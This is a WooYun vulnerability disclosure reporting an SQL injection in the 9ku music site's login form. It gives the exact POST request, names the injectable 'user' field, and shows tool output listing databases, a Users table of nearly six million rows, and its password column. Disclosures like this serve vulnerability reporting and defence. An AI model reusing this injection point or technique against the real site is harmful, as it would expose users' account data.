当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157752

漏洞标题:九酷音乐SQL注入漏洞(涉及600w用户)

相关厂商:九酷音乐

漏洞作者: 路人甲

提交时间:2015-12-02 20:16

修复时间:2016-01-16 20:18

公开时间:2016-01-16 20:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://my.9ku.com/love/ifr_login.asp

POST /love/ifr_login.asp HTTP/1.1
Host: my.9ku.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://my.9ku.com/love/ifr_login.asp
Cookie: ASPSESSIONIDQQRDDTCS=NKJANMLDMNOMKELEILPKHGKI
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
user=admin&pwd=admin&act=login&u=


user存在注入

漏洞证明:

available databases [29]:
[*] 51weimo
[*] cc123
[*] cheguanjia
[*] jkalbumrating
[*] jkartist
[*] jkdiyalbum
[*] jkfans
[*] jkfavorite
[*] jkfm
[*] jkmmpic
[*] jkmusichistory
[*] jkmyup
[*] jkpinglun
[*] jkrecommend
[*] jkselfzj
[*] jksms
[*] jksongrating
[*] jktag
[*] jkusers
[*] jkvisitor
[*] master
[*] meinvpic
[*] model
[*] msdb
[*] OpenMusic


Database: jkusers
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| dbo.Users | 5968982 |
| dbo.View_dates | 5940632 |
| dbo.view_users | 5940632 |
| dbo.userEmail | 2281345 |
| dbo.tempLogin | 253 |
| dbo.findpass | 80 |
| dbo.SongsCount | 18 |
| dbo.gcGongXianTop10 | 10 |
| dbo.T_Config | 4 |
| dbo.EmailTemplate | 2 |
+---------------------+---------+
Database: jkusers
Table: Users
[18 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| BirthDay | datetime |
| City | nvarchar |
| EMail | nvarchar |
| email2 | nvarchar |
| fm_tg | int |
| fm_ty | int |
| fm_xh | int |
| IsLock | tinyint |
| lrccount | int |
| masterphoto | nvarchar |
| point1_level | int |
| point2_level | int |
| Province | nvarchar |
| RID | int |
| RName | nvarchar |
| RPwd | nvarchar |
| rthistime | datetime |
| txtcount | int |
+--------------+----------+


j3.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)